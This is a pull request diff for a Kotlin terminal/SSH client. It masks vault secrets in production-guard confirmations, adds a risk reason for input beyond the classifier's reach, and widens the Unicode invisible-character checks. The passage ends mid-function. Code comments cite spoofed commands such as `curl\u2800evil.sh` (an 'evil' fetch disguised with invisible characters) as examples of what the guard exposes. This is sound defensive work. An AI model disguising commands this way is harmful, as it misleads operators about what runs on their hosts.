### PR TITLE
Confirmation dialogs: close the tails left over from #223

### DIFF
--- a/composeApp/src/commonMain/composeResources/values-ru/strings_risk.xml
+++ b/composeApp/src/commonMain/composeResources/values-ru/strings_risk.xml
@@ -19,4 +19,5 @@
     <string name="risk_bulk_delete">Массово удаляет найденные файлы.</string>
     <string name="risk_truncates_content">Обнуляет содержимое файлов.</string>
     <string name="risk_elevated">Выполняется с повышенными правами.</string>
+    <string name="risk_beyond_inspection">Превышает объём, который читает защита — часть ввода не классифицирована.</string>
 </resources>

--- a/composeApp/src/commonMain/composeResources/values-zh/strings_risk.xml
+++ b/composeApp/src/commonMain/composeResources/values-zh/strings_risk.xml
@@ -19,4 +19,5 @@
     <string name="risk_bulk_delete">批量删除匹配到的文件。</string>
     <string name="risk_truncates_content">清空文件内容。</string>
     <string name="risk_elevated">以提升的权限运行。</string>
+    <string name="risk_beyond_inspection">超出防护读取的范围 —— 部分输入未被分类。</string>
 </resources>

--- a/composeApp/src/commonMain/composeResources/values/strings_risk.xml
+++ b/composeApp/src/commonMain/composeResources/values/strings_risk.xml
@@ -19,4 +19,5 @@
     <string name="risk_bulk_delete">Bulk-deletes matched files.</string>
     <string name="risk_truncates_content">Discards file contents.</string>
     <string name="risk_elevated">Runs with elevated privileges.</string>
+    <string name="risk_beyond_inspection">Exceeds what the guard reads — part of this input was not classified.</string>
 </resources>

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/ai/CommandRiskText.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/ai/CommandRiskText.kt
@@ -3,6 +3,7 @@ package app.skerry.ui.ai
 import androidx.compose.runtime.Composable
 import app.skerry.shared.ai.CommandRiskReason
 import app.skerry.ui.generated.resources.Res
+import app.skerry.ui.generated.resources.risk_beyond_inspection
 import app.skerry.ui.generated.resources.risk_bulk_delete
 import app.skerry.ui.generated.resources.risk_deletes_files
 import app.skerry.ui.generated.resources.risk_disk_device_write
@@ -44,6 +45,7 @@ fun commandRiskReasonText(reason: CommandRiskReason): String = stringResource(
         CommandRiskReason.RecursivePermissions -> Res.string.risk_recursive_permissions
         CommandRiskReason.SecurityFileOverwrite -> Res.string.risk_security_file_overwrite
         CommandRiskReason.FirewallFlush -> Res.string.risk_firewall_flush
+        CommandRiskReason.BeyondInspection -> Res.string.risk_beyond_inspection
         CommandRiskReason.DeletesFiles -> Res.string.risk_deletes_files
         CommandRiskReason.KillsProcesses -> Res.string.risk_kills_processes
         CommandRiskReason.UninstallsPackages -> Res.string.risk_uninstalls_packages

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/app/AppLocals.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/app/AppLocals.kt
@@ -249,7 +249,8 @@ val LocalTerminalHistory: ProvidableCompositionLocal<TerminalHistoryStore?> = st
  * [LocalConnectHost] (keychain or password prompt). Supplied by [DesktopDesignApp]; default is a no-op
  * (mock path/preview).
  */
-val LocalRunSnippetOnHost: ProvidableCompositionLocal<(Host, String) -> Unit> = staticCompositionLocalOf { { _, _ -> } }
+val LocalRunSnippetOnHost: ProvidableCompositionLocal<(Host, String, List<String>) -> Unit> =
+    staticCompositionLocalOf { { _, _, _ -> } }
 
 /**
  * Unlocked [Vault] behind the master-password gate, needed by the settings screen (More) to toggle

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/design/CommandQuote.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/design/CommandQuote.kt
@@ -24,7 +24,6 @@ import androidx.compose.ui.unit.Dp
 import androidx.compose.ui.unit.TextUnit
 import androidx.compose.ui.unit.dp
 import androidx.compose.ui.unit.sp
-import app.skerry.shared.terminal.isSafeTerminalInputChar
 import app.skerry.ui.generated.resources.Res
 import app.skerry.ui.generated.resources.command_clipped
 import app.skerry.ui.generated.resources.command_clipped_partial
@@ -198,17 +197,17 @@ internal fun Notice(text: String, modifier: Modifier = Modifier) {
  * itself. Dropping them would be the other kind of lie — the drawn text would no longer be the text
  * that runs — so they are made visible.
  *
- * The predicate is the strict one, the same [isSafeTerminalInputChar] a command offered for
- * execution is filtered with: the looser display predicate keeps the zero-width set and the
- * directional marks, which reorder the digits of a path or a port and draw as nothing, and this is
- * the one place where the glyphs on screen have to be the bytes that will run. Newlines are the
- * exception — a quoted block is several lines by nature.
+ * The predicate is the strict one ([drawsAsItself]), stricter than the display filter untrusted
+ * prose gets: the looser predicate keeps the zero-width set and the directional marks, which
+ * reorder the digits of a path or a port and draw as nothing, and this is the one place where the
+ * glyphs on screen have to be the bytes that will run. Newlines are the exception — a quoted block
+ * is several lines by nature.
  *
  * Not reversible, and knowingly: a command that contains the literal text `<U+202E>` draws exactly
  * like one that contains the character. The ambiguity is one-directional — a real override is
  * always spelled out — so it can only warn about a line that needed no warning.
  */
-private fun visibleText(raw: String): String {
+internal fun visibleText(raw: String): String {
     // A block's lines arrive separated by CR on the way to a PTY — the Android IME funnel sends one
     // per line — so a CR is a break to draw, not a byte to spell out.
     val text = raw.replace("\r\n", "\n").replace('\r', '\n')
@@ -246,28 +245,29 @@ private fun StringBuilder.appendEscaped(code: Int) {
 }
 
 /**
- * Whether the character at [code] draws as what it is. [isSafeTerminalInputChar] is the strict predicate for text offered
- * for execution, but it passes the letters that draw as nothing at all ([INVISIBLE_LETTERS]) — and a
- * gap where a character should be is the same lie a bidi override tells: `curl\u2800evil.sh` reads as
- * two words and runs as one. A tab is left alone: a shell separates words on it too, so a gap there
+ * Whether the character at [code] draws as what it is. Decided by category, not by a list: the
+ * whole of CONTROL and FORMAT, the separators, and the letters that draw as nothing at all
+ * ([INVISIBLE_LETTERS], which no category names — `curl\u2800evil.sh` reads as two words and
+ * runs as one). A blocklist is one Unicode release behind by construction, and this is the block
+ * that promises the drawn text is the text that runs — the categories cover everything the
+ * hand-written `isSafeTerminalInputChar` pass here used to, and whatever the next Unicode revision
+ * adds to them, by default. A tab is left alone: a shell separates words on it too, so a gap there
  * is what it means.
  */
 private fun drawsAsItself(code: Int): Boolean {
-    if (code > Char.MAX_VALUE.code) return code !in INVISIBLE_ASTRAL
+    if (code > Char.MAX_VALUE.code) return INVISIBLE_ASTRAL.none { code in it }
     val c = code.toChar()
     if (c == '\n' || c == '\t' || c == ' ') return true
-    if (!isSafeTerminalInputChar(c) || c in INVISIBLE_LETTERS) return false
+    if (c in INVISIBLE_LETTERS) return false
     return when (c.category) {
         // A blank of space width that no shell splits a word on: `curl\u00A0evil.sh` is one argument
         // and reads as two. Ordinary space and tab are answered above — a shell does split on those.
         CharCategory.SPACE_SEPARATOR,
         CharCategory.LINE_SEPARATOR,
         CharCategory.PARAGRAPH_SEPARATOR,
-        // The whole format category rather than the list this predicate would otherwise carry:
-        // invisible operators, the Arabic number marks, the interlinear annotations. A blocklist is
-        // one Unicode release behind by construction, and this is the block that promises the drawn
-        // text is the text that runs.
+        // Invisible operators, bidi controls, the Arabic number marks, the interlinear annotations.
         CharCategory.FORMAT,
+        // C0, C1 and DEL — a control byte draws as less than nothing.
         CharCategory.CONTROL,
         // Half of a pair with no other half: it draws as the replacement glyph.
         CharCategory.SURROGATE,
@@ -296,11 +296,21 @@ private fun cutWholeTokens(cutOff: String): String {
 private const val ESCAPE_OPEN = "<U+"
 
 /**
- * Astral characters that draw nothing: the tag block (an invisible copy of ASCII) and the variation
- * selectors supplement. [isSafeTerminalInputChar] answers about one UTF-16 unit, so nothing else
- * reaches them.
+ * Astral characters that draw nothing. Format characters past the basic plane cannot be asked
+ * about the way the BMP is — `Char.category` sees one UTF-16 unit and `commonMain` has no
+ * `Character.getType(Int)` — so they are matched by block: every FORMAT (Cf) block above U+FFFF as
+ * of Unicode 15 plus the variation selectors supplement, which is equally invisible. Without the
+ * full list `curl\u{1D173}evil.sh` drew as two words and ran as one, the same lie the tag block
+ * told before it was closed.
  */
-private val INVISIBLE_ASTRAL = 0xE0000..0xE01EF
+private val INVISIBLE_ASTRAL = listOf(
+    0x110BD..0x110BD, // Kaithi number sign
+    0x110CD..0x110CD, // Kaithi number sign above
+    0x13430..0x1343F, // Egyptian hieroglyph format controls
+    0x1BCA0..0x1BCA3, // shorthand format controls
+    0x1D173..0x1D17A, // musical symbol beams and streams
+    0xE0000..0xE01EF, // tags + variation selectors supplement
+)
 
 /**
  * How much of a command a confirmation lays out. A few hundred kilobytes in one paragraph costs the

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/desktop/DesktopChrome.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/desktop/DesktopChrome.kt
@@ -56,6 +56,7 @@ import app.skerry.ui.runbook.RunbookPauseAnnouncer
 import app.skerry.ui.runbook.RunbookStartDialog
 import app.skerry.ui.snippet.SnippetManager
 import app.skerry.ui.snippet.SnippetRunDialog
+import app.skerry.ui.snippet.maskSecrets
 import app.skerry.ui.terminal.CommandPalette
 import app.skerry.ui.terminal.CastPlayerOverlay
 import app.skerry.ui.terminal.recordingOutcomeMessage
@@ -110,6 +111,7 @@ import app.skerry.ui.host.HostSection
 import app.skerry.ui.theme.Skerry
 import app.skerry.ui.host.ProdConnectDialog
 import app.skerry.ui.host.ProdConnectRequest
+import app.skerry.ui.host.prodDisplayRisk
 import app.skerry.ui.host.prodConnectGate
 import app.skerry.ui.host.ProdCommandGate
 import app.skerry.ui.host.prodGuardDialogOpen
@@ -262,10 +264,19 @@ internal fun DesktopChrome(
     // line (newline included) once connected. Dynamic variables were confirmed before this point —
     // SnippetManager.run parks them in the dialog and only then hands the line over.
     val runSnippetOnHost = remember(sessions, credentials, hostManager, state) {
-        { host: Host, line: String ->
+        { host: Host, line: String, secrets: List<String> ->
             // The line goes into the confirmation: it runs the moment the session opens, before the
-            // session's own guard is bound to it, so this dialog is where it has to be read.
-            prodConnect = prodConnectGate(host, snippetLine = line) { connectOrAsk(PendingAuth.Snippet(host, line)) }
+            // session's own guard is bound to it, so this dialog is where it has to be read. Vault
+            // secrets are masked in what the dialog draws; the risk is classified over the REAL
+            // line (a masked span can hide the very pattern that makes it risky), and the real line
+            // is what connects and runs.
+            prodConnect = prodConnectGate(
+                host,
+                snippetLine = maskSecrets(line, secrets),
+                snippetRisk = prodDisplayRisk(line)?.assessment?.reason,
+            ) {
+                connectOrAsk(PendingAuth.Snippet(host, line))
+            }
         }
     }
 

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/desktop/DesktopSessionActions.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/desktop/DesktopSessionActions.kt
@@ -64,7 +64,7 @@ internal fun runSnippetHotkey(event: KeyEvent, manager: SnippetManager?, session
     ) ?: return false
     val entry = manager.forShortcut(combo) ?: return false
     val terminal = (sessions?.active?.focusedPane?.controller?.uiState as? ConnectionUiState.Connected)?.terminal ?: return false
-    manager.run(entry.id, recording = terminal.recording) { terminal.sendUserInputGuarded(it) }
+    manager.run(entry.id, recording = terminal.recording) { text, secrets -> terminal.sendUserInputGuarded(text, secrets) }
     return true
 }
 

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/host/ProdGuardUi.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/host/ProdGuardUi.kt
@@ -73,21 +73,34 @@ import app.skerry.ui.app.UiTags
  * A connection to a production host waiting for confirmation: [host] names it in the dialog,
  * [proceed] is the connect that was held back, [snippetLine] carries the command of the "run a
  * snippet on this host" path (it opens a session AND runs a command, so the dialog quotes it).
+ * [snippetRisk] is that command's risk reason, classified by the caller over the REAL line —
+ * [snippetLine] may arrive with vault secrets masked, and a pattern that needs the resolved span
+ * would find nothing in the masked text.
  */
 @Immutable
-class ProdConnectRequest(val host: Host, val snippetLine: String? = null, val proceed: () -> Unit)
+class ProdConnectRequest(
+    val host: Host,
+    val snippetLine: String? = null,
+    val snippetRisk: CommandRiskReason? = null,
+    val proceed: () -> Unit,
+)
 
 /**
  * Gate in front of every connect path: a production host confirms first, anything else goes
  * straight through. Returns the pending request to show ([ProdConnectDialog]) or `null` when
  * [action] already ran.
  */
-fun prodConnectGate(host: Host, snippetLine: String? = null, action: () -> Unit): ProdConnectRequest? {
+fun prodConnectGate(
+    host: Host,
+    snippetLine: String? = null,
+    snippetRisk: CommandRiskReason? = null,
+    action: () -> Unit,
+): ProdConnectRequest? {
     if (!isProdHost(host)) {
         action()
         return null
     }
-    return ProdConnectRequest(host, snippetLine, action)
+    return ProdConnectRequest(host, snippetLine, snippetRisk, action)
 }
 
 /**
@@ -218,7 +231,9 @@ fun ProdConnectDialog(request: ProdConnectRequest, onDismiss: () -> Unit) {
         title = stringResource(Res.string.guard_prod_snippet_title),
         subtitle = stringResource(Res.string.guard_prod_snippet_message, request.host.rowLabel()),
         command = line,
-        reason = remember(line) { prodDisplayRisk(line) }?.assessment?.reason,
+        // Classified by the caller over the real line: [line] may carry masked vault secrets, and
+        // classifying the masked text loses any reason that lives inside the resolved span.
+        reason = request.snippetRisk,
         confirmLabel = stringResource(Res.string.guard_prod_connect_confirm),
         onConfirm = { onDismiss(); request.proceed() },
         onDismiss = onDismiss,

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/mobile/MobileSnippetsView.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/mobile/MobileSnippetsView.kt
@@ -196,7 +196,7 @@ private fun MobileSnippetsLive(state: MobileDesignState, manager: SnippetManager
                 onDelete = target?.let { e -> { manager.delete(e.id); adding = false; editing = null } },
                 onRun = run@{
                     val e = target ?: return@run
-                    manager.run(e.id, recording = activeTerminal?.recording == true) { text -> activeTerminal?.sendUserInputGuarded(text) }
+                    manager.run(e.id, recording = activeTerminal?.recording == true) { text, secrets -> activeTerminal?.sendUserInputGuarded(text, secrets) }
                     adding = false; editing = null
                     sessions?.active?.let { state.push(MobileRoute.Terminal) }
                 },

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/mobile/MobileTerminalView.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/mobile/MobileTerminalView.kt
@@ -277,7 +277,7 @@ fun MobileTerminalScreen(state: MobileDesignState) {
         if (paletteOpen && snippets != null && activeTerminal != null) {
             MobileSnippetRunSheet(
                 manager = snippets,
-                onRun = { entry -> snippets.run(entry.id, recording = activeTerminal.recording) { text -> activeTerminal.sendUserInputGuarded(text) }; paletteOpen = false },
+                onRun = { entry -> snippets.run(entry.id, recording = activeTerminal.recording) { text, secrets -> activeTerminal.sendUserInputGuarded(text, secrets) }; paletteOpen = false },
                 onDismiss = { paletteOpen = false },
             )
         }

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/runbook/RunbookRunner.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/runbook/RunbookRunner.kt
@@ -111,6 +111,9 @@ class RunbookRunner(
 
     private var script: RunbookScript? = null
     private var contextValue: (SnippetSegment.Variable) -> String = { "" }
+    // The run's resolved vault secrets, handed to the terminal with every sent line so the
+    // production guard's confirmation can mask them. Dropped with the closure on stop/close.
+    private var runSecrets: List<String> = emptyList()
     private var policy: RunbookPolicy = RunbookPolicy()
     private var runId: String = ""
     private var startedAt: Long = 0L
@@ -159,14 +162,18 @@ class RunbookRunner(
      * clipboard/vault/prompted values it collected and is called per step, so every step gets what
      * the user actually confirmed.
      */
-    fun confirmStart(contextValue: (SnippetSegment.Variable) -> String): Boolean {
+    fun confirmStart(secrets: List<String> = emptyList(), contextValue: (SnippetSegment.Variable) -> String): Boolean {
         val request = pending ?: return false
         pending = null
-        return start(request, contextValue)
+        return start(request, secrets, contextValue)
     }
 
     /** Starts a prepared [request]. Returns false (changing nothing) if a run is already in flight. */
-    fun start(request: RunbookStartRequest, contextValue: (SnippetSegment.Variable) -> String): Boolean {
+    fun start(
+        request: RunbookStartRequest,
+        secrets: List<String> = emptyList(),
+        contextValue: (SnippetSegment.Variable) -> String,
+    ): Boolean {
         if (active) return false
         synchronized(lock) {
             generation++
@@ -176,6 +183,7 @@ class RunbookRunner(
         this.runbook = request.runbook
         this.policy = request.runbook.policy
         this.contextValue = contextValue
+        this.runSecrets = secrets
         this.script = request.script
         this.runId = newId()
         this.startedAt = now()
@@ -313,6 +321,7 @@ class RunbookRunner(
         script = null
         // Drop the closure holding this run's clipboard/vault/parameter values.
         contextValue = { "" }
+        runSecrets = emptyList()
         runId = ""
     }
 
@@ -352,7 +361,7 @@ class RunbookRunner(
                     // would never run — and nothing is declared to the terminal, so nothing of the
                     // program's screen is captured or hidden. Only the user ends this step.
                     state.status = RunbookStepStatus.AWAITING_COMPLETE
-                    run.target.send(resolved.line + "\n")
+                    run.target.send(resolved.line + "\n", runSecrets)
                     watchLiveness(run)
                     return
                 }
@@ -360,7 +369,7 @@ class RunbookRunner(
                 // Declared before the line is sent, never after: the terminal reports only the step
                 // it was told to expect, and the echo it must hide starts arriving immediately.
                 run.target.expectStep(token, RunbookMarker.echoFragments(resolved.line, token))
-                run.target.send(RunbookMarker.probeLine(resolved.line, token) + "\n")
+                run.target.send(RunbookMarker.probeLine(resolved.line, token) + "\n", runSecrets)
                 watch(run, index, token)
             }
             is ResolvedRunbookStep.Transfer -> transfer(run, index, resolved)

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/runbook/RunbookSessionRun.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/runbook/RunbookSessionRun.kt
@@ -12,8 +12,12 @@ import app.skerry.shared.terminal.TerminalStepMark
 class RunbookTarget(
     /** Tab the run belongs to — the UI shows the run there and nowhere else. */
     val sessionId: String,
-    /** Sends a line to that terminal (bound to the guarded input path, production guard included). */
-    val send: (String) -> Unit,
+    /**
+     * Sends a line to that terminal (bound to the guarded input path, production guard included).
+     * The second argument is the run's resolved vault secrets, so the guard's confirmation can
+     * mask them instead of printing the resolved line in clear.
+     */
+    val send: (String, List<String>) -> Unit,
     /**
      * Declares the step about to be sent: which token the terminal should report, and the fragments
      * of the line that are protocol rather than the operator's command, so their echo is not drawn.

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/runbook/RunbookStartDialog.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/runbook/RunbookStartDialog.kt
@@ -63,7 +63,7 @@ fun RunbookStartDialog(runner: RunbookRunner, onStarted: () -> Unit = {}) {
     key(request) {
         RunbookStartDialogContent(
             request = request,
-            onConfirm = { values -> if (runner.confirmStart(values)) onStarted() },
+            onConfirm = { values, secrets -> if (runner.confirmStart(secrets, values)) onStarted() },
             onDismiss = runner::dismissStart,
         )
     }
@@ -72,7 +72,7 @@ fun RunbookStartDialog(runner: RunbookRunner, onStarted: () -> Unit = {}) {
 @Composable
 private fun RunbookStartDialogContent(
     request: RunbookStartRequest,
-    onConfirm: ((SnippetSegment.Variable) -> String) -> Unit,
+    onConfirm: (values: (SnippetSegment.Variable) -> String, secrets: List<String>) -> Unit,
     onDismiss: () -> Unit,
 ) {
     val mono = LocalFonts.current.mono
@@ -81,8 +81,9 @@ private fun RunbookStartDialogContent(
 
     val canRun = values.canRun
     val confirm = {
-        // The values are read once, here, and handed over as a snapshot.
-        if (canRun) onConfirm(runbookValueSnapshot(variables) { values.value(it, masked = false) })
+        // The values are read once, here, and handed over as a snapshot. The vault secrets ride
+        // along so the production guard can mask them in its own confirmation.
+        if (canRun) onConfirm(runbookValueSnapshot(variables) { values.value(it, masked = false) }, values.vaultSecrets())
     }
 
     ModalScrim(onDismiss = onDismiss) {

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/SnippetManager.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/SnippetManager.kt
@@ -53,7 +53,7 @@ class SnippetRunRequest internal constructor(
     val environment: SnippetRunEnvironment,
     val recording: Boolean,
     val initialParams: Map<String, String>,
-    internal val sendLine: (String) -> Unit,
+    internal val sendLine: (line: String, secrets: List<String>) -> Unit,
 )
 
 /** One row of the snippet list: the saved [snippet], updated via [SnippetManager.save]. */
@@ -173,11 +173,18 @@ class SnippetManager(
      * not untrusted input. A command with `${{…}}` variables never runs directly: it parks in
      * [pendingRun] until the dialog resolves and confirms it (variable values — clipboard, vault
      * secrets, Teams-shared templates — ARE untrusted; see [SnippetTemplate.resolve]).
+     * [send] also receives the resolved vault secrets of the run, so the terminal's own
+     * confirmation (the production guard) can mask them instead of printing the resolved line.
      * [recording] — whether the target terminal is recording, for the dialog's warning.
      * [params] seeds the dialog's prompted parameters (the snippets panel collects them before Run);
      * empty falls back to this snippet's previous run.
      */
-    fun run(id: String, recording: Boolean = false, params: Map<String, String> = emptyMap(), send: (String) -> Unit) {
+    fun run(
+        id: String,
+        recording: Boolean = false,
+        params: Map<String, String> = emptyMap(),
+        send: (line: String, secrets: List<String>) -> Unit,
+    ) {
         // A run initiated while the variable dialog is up would silently replace (or race) the
         // request the user is looking at — first request wins until confirmed or dismissed.
         if (pendingRun != null) return
@@ -186,7 +193,7 @@ class SnippetManager(
         if (segments.none { it is SnippetSegment.Variable }) {
             // Strip bidi/format tricks from the literal text too (Teams-shared snippets are not
             // "user-saved text"); an intentional multi-line script passes through unchanged.
-            send(stripUnsafeFormatChars(snippet.command) + "\n")
+            send(stripUnsafeFormatChars(snippet.command) + "\n", emptyList())
             return
         }
         pendingRun = SnippetRunRequest(
@@ -202,13 +209,14 @@ class SnippetManager(
     /**
      * The dialog confirmed the previewed [line]: send it (plus the newline) to the pending run's
      * terminal, remember [params] for the snippet's next run, close the dialog. No-op without a
-     * pending run (double-click after confirm).
+     * pending run (double-click after confirm). [secrets] are the resolved vault values inside
+     * [line] — passed along so the production guard's dialog can mask them.
      */
-    fun confirmRun(line: String, params: Map<String, String>) {
+    fun confirmRun(line: String, params: Map<String, String>, secrets: List<String> = emptyList()) {
         val pending = pendingRun ?: return
         pendingRun = null
         if (params.isNotEmpty()) lastParams[pending.snippet.id] = params
-        pending.sendLine(line + "\n")
+        pending.sendLine(line + "\n", secrets)
     }
 
     /** Close the variable dialog without running (Cancel/Esc/vault lock). */

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/SnippetRunDialog.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/SnippetRunDialog.kt
@@ -71,7 +71,7 @@ internal fun SnippetRunDialog(manager: SnippetManager) {
 @Composable
 private fun SnippetRunDialogContent(
     request: SnippetRunRequest,
-    onConfirm: (line: String, params: Map<String, String>) -> Unit,
+    onConfirm: (line: String, params: Map<String, String>, secrets: List<String>) -> Unit,
     onDismiss: () -> Unit,
 ) {
     val mono = LocalFonts.current.mono
@@ -85,7 +85,15 @@ private fun SnippetRunDialogContent(
     val preview = SnippetTemplate.assemble(request.segments, machine) { contextValue(it, masked = true) }
     val canRun = values.canRun
     val confirm = {
-        if (canRun) onConfirm(SnippetTemplate.assemble(request.segments, machine) { contextValue(it, masked = false) }, values.paramValues())
+        // The vault secrets ride along so the production guard's confirmation — one dialog later on
+        // a #prod host — can mask the same spans this dialog's preview masked.
+        if (canRun) {
+            onConfirm(
+                SnippetTemplate.assemble(request.segments, machine) { contextValue(it, masked = false) },
+                values.paramValues(),
+                values.vaultSecrets(),
+            )
+        }
     }
 
     ModalScrim(onDismiss = onDismiss) {

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/SnippetsView.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/SnippetsView.kt
@@ -262,6 +262,6 @@ private fun runSnippetInSession(
 ): Boolean {
     val pane = sessions?.tabs?.flatMap { it.panes }?.firstOrNull { it.id == targetId } ?: return false
     val terminal = (pane.controller.uiState as? ConnectionUiState.Connected)?.terminal ?: return false
-    manager.run(snippetId, recording = terminal.recording, params = params) { text -> terminal.sendUserInputGuarded(text) }
+    manager.run(snippetId, recording = terminal.recording, params = params) { text, secrets -> terminal.sendUserInputGuarded(text, secrets) }
     return true
 }

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/TemplateVariables.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/snippet/TemplateVariables.kt
@@ -60,6 +60,38 @@ import app.skerry.ui.design.FormField
 /** Mask shown wherever a vault secret would otherwise be printed. */
 internal const val SECRET_MASK = "••••••"
 
+/**
+ * [text] with every resolved vault secret span replaced by [SECRET_MASK]. Display only: what is
+ * sent or classified stays the real text. Shared by the confirmations that quote a resolved line —
+ * the production guard's dialog and the connect-time snippet gate.
+ *
+ * A string that was CUT mid-secret — the classifier caps a candidate at 512 characters, and the
+ * cut can land inside a resolved value — ends with a prefix of the secret, which the exact replace
+ * cannot see. Any trailing prefix of a secret is masked as well: that can hide a legitimate
+ * character that merely coincides with the secret's start, but the other direction printed the
+ * secret's head in the guard's aside in clear. The mirror image — a string that BEGINS mid-secret,
+ * reachable only through a soft-wrapped screen row that happens to carry a resolved value — is
+ * accepted residual risk: a leading-suffix rule cannot tell a secret's tail from ordinary text.
+ *
+ * Longest secret first: with one resolved value a substring of another, replacing the shorter
+ * first would mask only the embedded span and print the longer secret's flanks in clear.
+ */
+internal fun maskSecrets(text: String, secrets: List<String>): String {
+    val hidden = secrets.filter { it.isNotBlank() }.sortedByDescending { it.length }
+    if (hidden.isEmpty()) return text
+    var masked = hidden.fold(text) { acc, secret -> acc.replace(secret, SECRET_MASK) }
+    for (secret in hidden) {
+        val longest = minOf(secret.length - 1, masked.length)
+        for (cut in longest downTo 1) {
+            if (masked.endsWith(secret.substring(0, cut))) {
+                masked = masked.dropLast(cut) + SECRET_MASK
+                break
+            }
+        }
+    }
+    return masked
+}
+
 /** Vault reference resolution, done once when the confirmation opens. */
 internal sealed interface VaultRef {
     data class Ok(val secret: String) : VaultRef
@@ -104,6 +136,13 @@ class TemplateVariableValues internal constructor(
 
     /** Current parameter values, to remember for this template's next run. */
     fun paramValues(): Map<String, String> = params.toMap()
+
+    /**
+     * The resolved vault secrets of this run — the spans a later confirmation (the production
+     * guard's) must mask rather than print, exactly as this dialog's own preview masked them.
+     */
+    fun vaultSecrets(): List<String> =
+        vaultResolutions.values.filterIsInstance<VaultRef.Ok>().map { it.secret }
 
     /** Whether every reference resolved: a missing vault entry has no value to send. */
     val canRun: Boolean

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/HostRows.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/HostRows.kt
@@ -374,7 +374,7 @@ internal fun HostEntryRow(
                             SnippetPalette(snippets) { entry ->
                                 // Through the manager: a snippet with ${{…}} variables opens the confirm
                                 // dialog first; the resolved line (newline included) lands here after.
-                                snippets.run(entry.id) { line -> runSnippetOnHost(host, line) }
+                                snippets.run(entry.id) { line, secrets -> runSnippetOnHost(host, line, secrets) }
                                 snippetPickerOpen = false
                             }
                         }

--- a/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/ProductionGuardHold.kt
+++ b/composeApp/src/commonMain/kotlin/app/skerry/ui/terminal/ProductionGuardHold.kt
@@ -131,7 +131,11 @@ class ProductionGuardHold {
      * Whether [text] is held back instead of being sent. Every lambda is evaluated only when it can
      * matter — [screenGuesses] reads the screen, which is wasted work on a session with no guard.
      *
-     * [runLines] is what this input will actually run, line by line, and is what gets classified.
+     * [own] is the finding of what this input will actually run — classified by the caller
+     * ([ProductionGuard.inspectCandidates] over [ProductionGuard.candidatesOf] for a block), because
+     * only the caller knows what the input's lines and lengths are; the policy it must answer for is
+     * handed in.
+     *
      * [partialGuess] is a line the client knows it holds only the beginning of — the shell completed
      * it. It is classified like the rest and may stand in for a blank quote, but the length then goes
      * out as null: what is drawn is a prefix, and no count over it would be true.
@@ -140,13 +144,19 @@ class ProductionGuardHold {
      * *guesses* is on the shell line already — a row the host drew, or the tracked line joined to
      * this input — so building the quote from it would put a command in the dialog that this input
      * is not going to run. When a guess is what tripped the guard it is published as
-     * [pendingAside] and drawn beside the quote as its own statement.
+     * [pendingAside] and drawn beside the quote as its own statement. [screenLineCut] says the
+     * cursor row continues past the cursor — a screen-sourced finding is then a beginning of the
+     * line that runs, and no count over it would be true, so the length goes out as null.
      *
      * [quote] is what to show — [text] itself for anything ready-made, and for keystrokes whatever
-     * the caller knows the shell line already holds. It is not built from [runLines]: those are
-     * capped in number to bound the classifier's work, so a quote built from them would drop the
-     * lines past the cap, while
-     * [take] replays every byte.
+     * the caller knows the shell line already holds. It is not built from the classified candidates:
+     * those are capped in number to bound the classifier's work, so a quote built from them would
+     * drop the lines past the cap, while [take] replays every byte.
+     *
+     * [present] is applied to everything the dialog may draw — the quote and the aside — and to
+     * nothing that is classified or replayed. It exists for one case: input carrying a resolved
+     * vault secret, which the confirmation must mask exactly as the snippet dialog masked it one
+     * step earlier.
      *
      * `true` means the caller must send nothing: either the input is now waiting for confirmation,
      * or it was dropped because something else already is.
@@ -155,50 +165,83 @@ class ProductionGuardHold {
         text: String,
         from: HeldInputSource,
         quote: () -> String = { text },
+        present: (String) -> String = { it },
         screenGuesses: () -> List<String> = { emptyList() },
+        screenLineCut: () -> Boolean = { false },
         partialGuess: () -> PartialGuess? = { null },
-        runLines: () -> List<String>,
+        own: (ProductionGuardPolicy) -> GuardedCommand?,
     ): Boolean {
         if (!policy.production) return false
         // The claim and the publish are one step: two callers that both passed the "nothing pending"
         // check would leave the dialog describing one block and [take] replaying the other.
         return synchronized(claim) {
             if (pending != null) return@synchronized true
-            claimAndPublish(text, from, quote, Guesses(screenGuesses(), partialGuess()), runLines())
+            claimAndPublish(HeldInput(text, from), quote, present, Guesses(screenGuesses(), screenLineCut(), partialGuess()), own)
         }
     }
 
     private fun claimAndPublish(
-        text: String,
-        from: HeldInputSource,
+        input: HeldInput,
         quote: () -> String,
+        present: (String) -> String,
         guesses: Guesses,
-        runLines: List<String>,
+        own: (ProductionGuardPolicy) -> GuardedCommand?,
     ): Boolean {
-        // Two lists, two classifications: [MAX_GUARDED_CANDIDATES] bounds the work per list, and
